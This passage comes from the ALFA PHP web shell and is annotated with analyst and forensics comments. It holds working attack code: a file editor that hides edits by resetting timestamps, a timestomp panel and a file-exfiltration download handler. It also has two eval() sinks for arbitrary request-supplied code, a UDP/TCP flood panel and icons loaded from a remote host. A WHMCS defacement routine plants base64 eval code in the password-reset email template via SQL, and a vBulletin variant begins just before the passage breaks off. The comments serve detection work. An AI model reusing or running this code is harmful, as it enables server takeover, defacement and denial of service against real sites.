  3571.     $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
  3572. }
  3573. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
  3574. break;
        // edit: overwrite the file with alfa3.
        // Forensics: the file's mtime is read before the write and put back with touch()
        // afterwards, so mtime alone will not show this modification; compare ctime or a
        // file-integrity baseline instead.
        // Forensics: on the fallback path the new content is first written to
        // <name><random 111-9999> in the directory of the running script and then moved over
        // the target with `mv`, so short-lived files with that naming may appear there.
  3575. case 'edit':
  3576. @chdir($_POST['c']);
  3577. if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
  3578. echo 'File isn\'t writeable';
  3579. break;
  3580. }
  3581. if(!empty($_POST['alfa3'])){
        // The edit form submits '1'+text (see the onsubmit below) so that an empty body still
        // passes !empty(); the leading character is dropped here.
  3582. $_POST['alfa3'] = substr($_POST['alfa3'],1);
  3583. $time = @filemtime($_POST['alfa1']);
  3584. $fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
  3585. if($chdir_fals&&$alfa_canruncmd){
  3586.     $rname = $alfa1_decoded;
  3587.     $randname = $rname.rand(111,9999);
  3588.     $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
  3589.     if($fp = @__write_file($filepath ,$_POST['alfa3'])){
  3590.         alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
  3591.     }
  3592. }
  3593. if($fp){
  3594. echo 'Saved!<br><script>alfa3_="";</script>';
  3595. @touch($_POST['alfa1'],$time,$time);
  3596. }
  3597. }
  3598. echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
  3599. echo htmlspecialchars(__read_file($_POST['alfa1']));
  3600. echo '</textarea><p><input type="submit" value=" "></p></form>';
  3601. break;
        // hexdump: three columns (offset, hex bytes, text), 32 bytes per row; bytes 0, 9, 10
        // and 13 are shown as a space in the text column.
  3602. case 'hexdump':
  3603. @chdir($_POST['c']);
  3604. $c = __read_file($_POST['alfa1']);
  3605. $n = 0;
  3606. $h = array('00000000<br>','','');
  3607. $len = strlen($c);
  3608. for ($i=0; $i<$len; ++$i) {
  3609. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  3610. switch ( ord($c[$i]) ) {
  3611. case 0: $h[2] .= ' '; break;
  3612. case 9: $h[2] .= ' '; break;
  3613. case 10: $h[2] .= ' '; break;
  3614. case 13: $h[2] .= ' '; break;
  3615. default: $h[2] .= $c[$i]; break;
  3616. }
  3617. $n++;
  3618. if ($n == 32) {
  3619. $n = 0;
  3620. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
  3621. $h[1] .= '<br>';
  3622. $h[2] .= "\n";
  3623. }
  3624. }
  3625. echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
  3626. break;
        // rename: shell `mv` on the fallback path, then PHP rename(); the emitted script
        // patches the old name to the new one in the already-rendered file list.
  3627. case 'rename':
  3628. @chdir($_POST['c']);
  3629. $alfa1_escape = addslashes($_POST["alfa1"]);
  3630. $alfa3_escape = addslashes($_POST["alfa3"]);
  3631. if(!empty($_POST['alfa3'])){
  3632. $cmd_rename = false;
  3633. if($chdir_fals&&$alfa_canruncmd){
  3634. if(_alfa_is_writable($_POST['alfa1'])){
  3635. $alfa1_escape = addslashes($alfa1_decoded);
  3636. alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
  3637. }else{
  3638. $cmd_rename = true;
  3639. }
  3640. }else{
  3641. $alfa1_escape = addslashes($_POST["alfa1"]);
  3642. }
  3643. if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
  3644. echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
  3645. }
  3646. echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
  3647. break;
        // touch: set the file's mtime and atime to strtotime(alfa3), via `touch -d` on the
        // fallback path and PHP touch() otherwise.
        // Forensics: timestamps on files under a directory this shell could reach are
        // operator-controlled and should not anchor a timeline on their own.
  3648. case 'touch':
  3649. @chdir($_POST['c']);
  3650. if( !empty($_POST['alfa3']) ) {
  3651. $time = strtotime($_POST['alfa3']);
  3652. if($time){
  3653. $touched = false;
  3654. if($chdir_fals&&$alfa_canruncmd){
  3655.     alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
  3656.     $touched = true;
  3657. }
  3658. if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
  3659. echo 'Fail!';
  3660. else
  3661. echo 'Touched!';
  3662. } else echo 'Bad time format!';
  3663. }
  3664. clearstatcache();
  3665. echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
  3666. break;
        // image: embed the file in the page as a base64 data: URI. On the fallback path the
        // bytes, dimensions and MIME type come from `cat | base64`, `identify` and
        // `file --mime-type`; otherwise from __read_file() and getimagesize().
  3667. case 'image':
  3668. @chdir($_POST['c']);
  3669. echo('<hr>');
  3670. $file = $_POST['alfa1'];
  3671. $image_info = @getimagesize($file);
  3672. if(is_array($image_info)||$chdir_fals){
  3673. $width = (int)$image_info[0];
  3674. $height = (int)$image_info[1];
  3675. if($chdir_fals&&$alfa_canruncmd){
  3676.     $source = alfaEx("cat '".addslashes($file)."' | base64");
  3677.     list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
  3678.     $mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
  3679.     $image_info['mime'] = $mime[1];
  3680. }else{
  3681.     $source = __ZW5jb2Rlcg(__read_file($file, false));
  3682. }
  3683. $image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
  3684. if($width > 800){$width = 800;}
  3685. echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
  3686. }
  3687. break;
  3688. }
  3689. echo '</div>';
  3690. alfaFooter();
  3691. }
  3692. function findicon($file,$type){
        // Returns the icon URL for a file-list entry.
        //   $file - entry name; $type - 'file' for files, anything else is treated as a directory.
        // Directories get back.png (for '..') or folder.png. Files get <ext>.png when the
        // lower-cased text after the last '.' is in $types, otherwise notfound.png.
        // Analyst note: every URL is rooted at a fixed remote host. If the rendered UI loads
        // these icons (the code using the return value is outside this excerpt), requests to
        // this host and path from a browser on the network are a candidate indicator.
  3693. $s = 'http://solevisible.com/icons/';
  3694. $types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
  3695. if($type!='file'){
  3696. return ($file=='..'?$s.'back.png':$s.'folder.png');
  3697. }else{
  3698. $ext = explode('.',$file);
  3699. $ext = end($ext);
  3700. $ext = strtolower($ext);
  3701. return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
  3702. }
  3703. }
  3704. function alfadlfile(){
        // Analyst note: file download handler. Needs $_POST['c'] (directory) and $_POST['file'];
        // the path served is c + '/' + basename(file), sent as an attachment with
        // Content-Type application/octet-stream through a gzip output buffer.
        // When $GLOBALS["glob_chdir_false"] is set (assigned outside this excerpt) the file is
        // first copied with `cp` into the directory of the running script under
        // <basename><random 111-9999>, read out, and unlinked.
        // Forensics: short-lived copies of exfiltrated files with that naming may therefore
        // appear next to the shell; file-creation auditing on the web root would record them.
        // alfaEx() and _alfa_can_runCommand() are defined outside this excerpt.
  3705. if(isset($_POST['c'],$_POST['file'])){
  3706. $basename = rawurldecode(basename($_POST['file']));
  3707. $_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
  3708. $alfa_canruncmd = _alfa_can_runCommand(true,true);
  3709. if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
  3710. ob_start("ob_gzhandler", 4096);
  3711. header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
  3712. header("Content-Type: application/octet-stream");
  3713. if(isset($GLOBALS["glob_chdir_false"])){
  3714.     $randname = $basename.rand(111,9999);
  3715.     $scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
  3716.     $filepath = $scriptpath."/".$randname;
  3717.     if(_alfa_is_writable($scriptpath)){
  3718.         alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
  3719.         readfile($filepath);
  3720.         @unlink($filepath);
  3721.     }else{
        // The return value of this call is not echoed here; whether anything reaches the
        // client depends on alfaEx() itself - cannot tell from this excerpt.
  3722.         alfaEx("cat '".addslashes($_POST["file"])."'");
  3723.     }
  3724. }else{
  3725.     readfile($_POST['file']);
  3726. }
  3727. }else echo('Error...!');}}
  3728. function alfaphpeval(){
        // Analyst note: environment-disclosure and code-execution panel.
        //   $_POST['alfa2'] = 'ini' | 'info' | 'exten' prints ini_get_all(), phpinfo() or
        //                     get_loaded_extensions().
        //   $_POST['alfa1'] = code to run; $_POST['alfa3'] = language selector.
        // With alfa3 == "php" the code goes straight into eval(). Otherwise, when commands can
        // be run and $GLOBALS["sys"] is "unix", it is written to a file and executed by the
        // program named in alfa3 (the form offers php, perl, python, bash).
        // Detection: the PHP / web-server account spawning mktemp, mv, rm and an interpreter
        // whose argument is a file named temp<5 digits>.
        // alfaEx(), _alfa_can_runCommand() and __write_file() are defined outside this excerpt.
  3729. alfahead();
  3730. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
  3731. echo '<div class=header>';
  3732. ob_start();
  3733. $INI=ini_get_all();
  3734. print '<table border=0><tr>'
  3735. .'<td class="listing"><font class="highlight_txt">Param</td>'
  3736. .'<td class="listing"><font class="highlight_txt">Global value</td>'
  3737. .'<td class="listing"><font class="highlight_txt">Local Value</td>'
  3738. .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
  3739. foreach ($INI as $param => $values)
  3740. print "\n".'<tr>'
  3741. .'<td class="listing"><b>'.$param.'</td>'
  3742. .'<td class="listing">'.$values['global_value'].' </td>'
  3743. .'<td class="listing">'.$values['local_value'].' </td>'
  3744. .'<td class="listing">'.$values['access'].' </td></tr>';
  3745. $tmp = ob_get_clean();
  3746. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3747. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3748. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3749. }
        // phpinfo() output is captured and its embedded CSS rules rewritten before display.
  3750. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
  3751. echo '<div class=header><style>.p {color:#000;}</style>';
  3752. ob_start();
  3753. phpinfo();
  3754. $tmp = ob_get_clean();
  3755. $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
  3756. $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
  3757. echo str_replace('<h1','<h2', $tmp) .'</div><br>';
  3758. }
  3759. if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
  3760. echo '<div class=header>';
  3761. ob_start();
  3762. $EXT=get_loaded_extensions();
  3763. echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
  3764. echo '</div><br>';
  3765. }
  3766. $lang_html = "";
  3767. foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
  3768. echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
  3769. echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
  3770. if(!empty($_POST['alfa1'])){
  3771. if($_POST['alfa3']=="php"){
        // Request-supplied PHP is evaluated in-process; only its captured output is escaped.
  3772. ob_start();
  3773. eval($_POST['alfa1']);
  3774. $result = htmlspecialchars(ob_get_clean());
  3775. }elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
        // Forensics: only the dirname of the `mktemp` output is used and cached in the session;
        // nothing in this block removes the file mktemp created (assuming alfaEx() runs the
        // command), so one stray empty temp file per session is a possible artifact.
  3776.     if(isset($_SESSION["eval_tmpdir"])){
  3777.         $tempdir = $_SESSION["eval_tmpdir"];
  3778.     }else{
  3779.         $tempdir = dirname(alfaEx("mktemp"));
  3780.         $_SESSION["eval_tmpdir"] = $tempdir;
  3781.     }
        // The code is written as temp<5 digits> in the current working directory, moved into
        // the temp directory, run with alfa3 as the program name, and then removed.
  3782.     $lang = $_POST['alfa3'];
  3783.     $filename = "temp".rand(11111,99999);
  3784.     $temp = $tempdir."/".$filename ;
  3785.     __write_file($filename, $_POST['alfa1']);
  3786.     $result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
  3787.     @unlink($filename);
  3788.     @unlink($temp);
  3789. }
  3790. echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
  3791. }
  3792. echo '</pre></div>';
  3793. alfafooter();
  3794. }
  3795. function alfahash(){
        // Analyst note: string encode/decode/hash panel.
        //   $_POST['alfa1'] - a PHP expression containing the placeholder $s (the form offers
        //                     the values of $stringTools)
        //   $_POST['alfa2'] - the input string substituted for $s
        // The expression is run with eval(). The in_array() check against $stringTools comes
        // after the eval() and only decides whether the result is displayed, so this function
        // is a second eval() sink in the file alongside alfaphpeval().
        // __ZW5jb2Rlcg / __ZGVjb2Rlcg are defined outside this excerpt; the labels below pair
        // them with base64 encode / decode.
        // Polyfills, declared only when the names are not already defined:
  3796. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  3797. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
        // Menu label => expression template.
  3798. $stringTools = array(
  3799. 'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
  3800. 'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
  3801. 'strrev ( $string )' => 'strrev($s)',
  3802. 'bin2hex ( $string )' => 'bin2hex($s)',
  3803. 'hex2bin ( $string )' => 'hex2bin($s)',
  3804. 'md5 ( $string )' => 'md5($s)',
  3805. 'sha1 ( $string )' => 'sha1($s)',
        // The label reads "sha251" but the expression computes sha256.
  3806. 'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
  3807. 'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
  3808. 'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
  3809. 'crypt ( $string )' => 'crypt($s)',
  3810. 'crc32 ( $string )' => 'crc32($s)',
  3811. 'str_rot13 ( $string )' => 'str_rot13($s)',
  3812. 'urlencode ( $string )' => 'urlencode($s)',
  3813. 'urldecode  ( $string )' => 'urldecode($s)',
  3814. 'full_urlencode  ( $string )' => 'full_urlencode($s)',
  3815. 'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)',
  3816. 'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
  3817. 'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
  3818. 'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
  3819. 'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
  3820. 'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
  3821. 'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
  3822. );
  3823. alfahead();
  3824. echo '<div class=header>';
  3825. echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
  3826. foreach($stringTools as $k => $v)
  3827. echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
  3828. echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
  3829. if(!empty($_POST['alfa1'])){
        // $s in the submitted expression is replaced by the single-quoted input, then
        // "echo <expression>;" is evaluated with its output captured.
  3830. $string = addslashes($_POST['alfa2']);
  3831. $string = str_replace('\"','"',$string);
  3832. $alg = $_POST['alfa1'];
  3833. $code = str_replace('$s',"'".$string."'",$alg);
  3834. ob_start();
  3835. eval('echo '.$code.';');
  3836. $res = ob_get_contents();
  3837. ob_end_clean();
  3838. if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
  3839. }
  3840. echo "</div>";
  3841. alfaFooter();
  3842. }
  3843. function alfados(){
        // Analyst note: outbound traffic-flood panel. Request fields:
        //   $_POST['alfa1'] - target host      $_POST['alfa2'] - duration in seconds
        //   $_POST['alfa3'] - target port      $_POST['alfa4'] - 'udp' or 'tcp'
        // Until the duration has elapsed, the loop opens a socket to the target and writes a
        // fixed payload of 65000 'X' bytes; ignore_user_abort(true) keeps the request running
        // after the operator's browser disconnects.
        // Detection: a PHP / web-server worker emitting a sustained stream of large
        // single-character payloads to one host:port, and a request that stays open for
        // roughly the requested duration.
        // Mitigation: egress filtering and outbound rate limits on web hosts contain this.
  3844. alfahead();
  3845. echo '<div class=header>';
  3846. echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
  3847. if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
  3848. echo __pre();
  3849. $packets=0;
  3850. ignore_user_abort(true);
  3851. $exec_time=(int)$_POST['alfa2'];
  3852. $time=time();
  3853. $max_time=$exec_time+$time;
  3854. $host=$_POST['alfa1'];
  3855. $port=(int)$_POST['alfa3'];
  3856. $method=$_POST['alfa4'];
  3857. $out = str_repeat('X',65000);
  3858. while(1){
  3859. $packets++;
  3860. if(time() > $max_time){
  3861. break;
  3862. }
  3863. $fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
  3864. if($fp){
  3865. fwrite($fp, $out);
  3866. fclose($fp);
  3867. }
  3868. }
        // Summary line printed to the operator once the loop ends.
  3869. echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
  3870. echo "</pre>";
  3871. }
  3872. echo '</div>';
  3873. alfafooter();
  3874. }
  3875. function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');} // Returns the opening <pre id="strOutput"> tag the panels print before their output; the fixed id and class are a stable string for content signatures.
  3876. function alfaIndexChanger(){
  3877. alfahead();
  3878.  
  3879. echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
  3880. if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
  3881. echo __pre();
  3882.  
  3883. echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
  3884. <p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
  3885. ";
  3886. $table = array('td1' =>
  3887.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3888.  'td2' =>
  3889.  array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  3890.  'td3' =>
  3891.  array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
  3892.  'td4' =>
  3893.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3894.  'td5' =>
  3895.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3896.  'td6' =>
  3897.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  3898. );
  3899. create_table($table);
  3900. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3901. <textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
  3902. <input type='submit' value=' '>
  3903. </form></center></center>";
  3904. if(isset($_POST['alfa6'])){
  3905. $s0levisible="Powered By Solevisible";
  3906. $dbu = $_POST['alfa6'];
  3907. $path = $_POST['alfa5'];
  3908. $fname = $_POST['alfa4'];
  3909. $dbn = $_POST['alfa7'];
  3910. $dbp = $_POST['alfa8'];
  3911. $dbh = $_POST['alfa9'];
  3912. $index = $_POST['alfa10'];
  3913. $index = str_replace("\'","'",$index);
  3914. $deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
  3915. $saveData = __ZW5jb2Rlcg($deface);
  3916. $Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
  3917. if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
  3918. $conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
  3919. $soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  3920. $soleGet = mysqli_fetch_assoc($soleSave);
  3921. $tempSave1 = $soleGet['message'];
  3922. $tempSave = str_replace("'","\'",$tempSave1);
  3923. $inject = "UPDATE tblemailtemplates SET message='$Def' WHERE name='Password Reset Validation'";
  3924. $result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));
  3925. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  3926. $result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));
  3927. if(function_exists('curl_version')){
  3928. $AlfaSole = new AlfaCURL(true);
  3929. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  3930. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  3931. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  3932. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  3933. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  3934. __alert('File Created...');
  3935. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$path."/".$fname."'>Click Here !</a></font></b></center><br><br>";
  3936. }else{
  3937. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target </font><font color=red>\" ".$path."/pwreset.php \"</font><br/><font color=\"#FFFFFF\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\"#FFFFFF\">and go to</font> <font color=red>\" ".$path."/".$fname." \"</font></b></center><br><br>";
  3938. }}}}
  3939. if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'vb')){
  3940. echo __pre();
  3941.  
  3942. echo "<center><center><div class='txtfont_header'>| vBulletin |</div>
  3943. <p><center>".getConfigHtml('vb')."<form onSubmit=\"g('IndexChanger',null,'vb',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,'>>'); return false;\">
  3944. ";
  3945. $table = array('td1' =>
  3946.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  3947.  'td2' =>
  3948.  array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  3949.  'td3' =>
  3950.  array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  3951.  'td4' =>
  3952.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  3953.  'td5' =>
  3954.  array('color' => 'FFFFFF', 'tdName' => 'Prefix', 'inputName' => 'prefix', 'id' => 'db_prefix', 'inputValue' => '', 'inputSize' => '50')
  3955. );
  3956. create_table($table);
  3957. echo "<br><div class='txtfont'>| Your Index |</div><br>
  3958. <textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
  3959. <input type='submit' value=' '></form></center></center>";
  3960. if($_POST['alfa8']=='>>'){
